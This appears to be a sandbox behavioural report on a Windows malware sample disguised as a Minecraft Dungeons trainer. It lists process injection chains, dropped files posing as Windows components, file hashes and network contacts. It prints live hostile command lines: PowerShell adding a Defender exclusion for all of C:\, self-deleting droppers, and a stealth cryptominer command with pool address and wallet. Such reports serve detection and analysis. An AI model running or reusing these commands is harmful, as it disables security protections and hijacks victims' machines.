PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 428 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
PID 428 wrote to memory of 1984 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
PID 428 wrote to memory of 2180 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 2180 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 2180 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 3632 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
PID 428 wrote to memory of 3632 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
PID 2180 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WScript.exe
PID 2180 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WScript.exe
PID 2180 wrote to memory of 1848 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WScript.exe
PID 3632 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Windows\System32\WScript.exe
PID 3632 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Windows\System32\WScript.exe
PID 3632 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 1848 wrote to memory of 3052 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 3052 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 3052 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

"C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

"C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

"C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 3368

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3368 -s 292

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 3368

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3368 -s 296

Network

Country Destination Domain Proto
US 8.238.111.254:80 tcp
NL 8.248.7.254:80 tcp
NL 8.248.7.254:80 tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
IE 51.104.164.114:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 cp801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 cp801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 gumerez.xyz udp
NL 37.0.11.77:1991 gumerez.xyz tcp
NL 37.0.11.77:1991 gumerez.xyz tcp

Files

memory/3768-130-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3768-131-0x0000000000D30000-0x0000000001252000-memory.dmp

memory/3768-132-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

memory/3768-133-0x0000000007B80000-0x0000000008124000-memory.dmp

memory/3768-134-0x00000000076C0000-0x0000000007752000-memory.dmp

memory/428-135-0x0000000000400000-0x00000000009D6000-memory.dmp

memory/428-136-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

MD5 2ad4097e232d4002a5e90fa049607869
SHA1 9a860a3781854339d3482dd57e75a363c1bde12e
SHA256 b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66
SHA512 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

MD5 2ad4097e232d4002a5e90fa049607869
SHA1 9a860a3781854339d3482dd57e75a363c1bde12e
SHA256 b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66
SHA512 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

MD5 2daa88a0e9da6be6cf972bdb6ebd1ed7
SHA1 c92d498fe840c676b941494fd30624ee4b91bf19
SHA256 dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c
SHA512 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

MD5 2daa88a0e9da6be6cf972bdb6ebd1ed7
SHA1 c92d498fe840c676b941494fd30624ee4b91bf19
SHA256 dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c
SHA512 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c

memory/2180-141-0x0000000000010000-0x000000000020E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe.log

MD5 89367199dcebc9edec7c34f3eaf57f5f
SHA1 e344c634845a8d8fc908ceb38df15a26c3f10337
SHA256 1ddb35177c237e096d50a243a9ff8bfd8ed98921dc0ecfd1f2e941d463293f72
SHA512 6ee8b58a1d432f9ffeea9a8d9d9ad75b66f2e609402c4596fff8debc1f746f5ce695e66c1feae01d87b1803e4ccc55aa3c894f6cf5046634e12a5f7292e18131

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

MD5 50d63ac6d3d7534ab90cdebb34dd3913
SHA1 61b04d2c8caa511db49ac8305e85466cb2d3c147
SHA256 ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff
SHA512 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

MD5 50d63ac6d3d7534ab90cdebb34dd3913
SHA1 61b04d2c8caa511db49ac8305e85466cb2d3c147
SHA256 ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff
SHA512 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab

memory/2180-145-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3632-146-0x0000000000D70000-0x0000000000FCA000-memory.dmp

memory/1984-147-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/1984-149-0x00000155D44B6000-0x00000155D44B7000-memory.dmp

memory/1984-148-0x00000155D44B3000-0x00000155D44B5000-memory.dmp

memory/1984-150-0x00000155D44B0000-0x00000155D44B2000-memory.dmp

memory/3632-151-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/2180-152-0x0000000004B60000-0x0000000004B61000-memory.dmp

memory/3632-153-0x00000000018F0000-0x00000000018F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs

MD5 41ba08c2482349cca240dab7a700c99b
SHA1 7092954d24879f12a4af640b5e4751a61b85875d
SHA256 a3d7b48a1ce8ce3d2a205c5f1a25a84e07d114a747e181e33c17ab3e28cd690b
SHA512 d3dc824461f5927ca33487ad6341fb70899c3335ae0a7de098b346d65ec0fc9873f1853e1fe99e4a499e5904f50ba9ab91186fbf59f9c9433f36affee0aef6b7

memory/1624-159-0x0000025604B10000-0x0000025604B32000-memory.dmp

memory/1624-162-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/1624-163-0x00000256030A0000-0x00000256030A2000-memory.dmp

memory/1624-164-0x00000256030A3000-0x00000256030A5000-memory.dmp

memory/1624-165-0x00000256030A6000-0x00000256030A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

MD5 5d4073b2eb6d217c19f2b22f21bf8d57
SHA1 f0209900fbf08d004b886a0b3ba33ea2b0bf9da8
SHA256 ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3
SHA512 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159

memory/3004-168-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3004-169-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3004-166-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3032-172-0x0000000140000000-0x000000014021E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

MD5 2edd0b288fe2459da84e4274d1942343
SHA1 c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4
SHA256 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768
SHA512 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

MD5 2edd0b288fe2459da84e4274d1942343
SHA1 c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4
SHA256 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768
SHA512 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9

memory/768-175-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

memory/768-176-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/768-177-0x0000000004CF2000-0x0000000004CF3000-memory.dmp

memory/768-178-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

memory/3032-179-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/3032-184-0x0000016C9AE80000-0x0000016C9AE82000-memory.dmp

memory/3032-185-0x0000016C9AEB0000-0x0000016C9AEC2000-memory.dmp

memory/3836-187-0x0000024EA2E00000-0x0000024EA2E02000-memory.dmp

memory/3836-186-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/3836-188-0x0000024EA2E03000-0x0000024EA2E05000-memory.dmp

memory/3836-192-0x0000024EA2E06000-0x0000024EA2E08000-memory.dmp

memory/768-193-0x0000000007730000-0x0000000007D58000-memory.dmp

memory/1984-196-0x00000155D44B7000-0x00000155D44B8000-memory.dmp

memory/3052-197-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3052-198-0x0000000006750000-0x0000000006751000-memory.dmp

memory/3052-199-0x0000000006752000-0x0000000006753000-memory.dmp

memory/1984-200-0x00000155D44B8000-0x00000155D44BA000-memory.dmp

memory/1984-201-0x00000155D44BA000-0x00000155D44BF000-memory.dmp

memory/3836-202-0x0000024EA2E08000-0x0000024EA2E09000-memory.dmp

memory/3052-204-0x0000000006CA0000-0x0000000006CC2000-memory.dmp

memory/3368-203-0x0000000140000000-0x0000000140758000-memory.dmp

memory/3368-205-0x0000000140000000-0x0000000140758000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22fbec4acba323d04079a263526cef3c
SHA1 eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512 fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

memory/3368-206-0x0000000140000000-0x0000000140758000-memory.dmp

memory/768-210-0x0000000007F90000-0x0000000007FF6000-memory.dmp

memory/3052-211-0x00000000075F0000-0x0000000007656000-memory.dmp

memory/768-212-0x0000000008000000-0x0000000008066000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22fbec4acba323d04079a263526cef3c
SHA1 eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512 fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

memory/768-214-0x00000000085C0000-0x00000000085DE000-memory.dmp

memory/768-215-0x0000000004CF5000-0x0000000004CF7000-memory.dmp

memory/3052-216-0x0000000006755000-0x0000000006757000-memory.dmp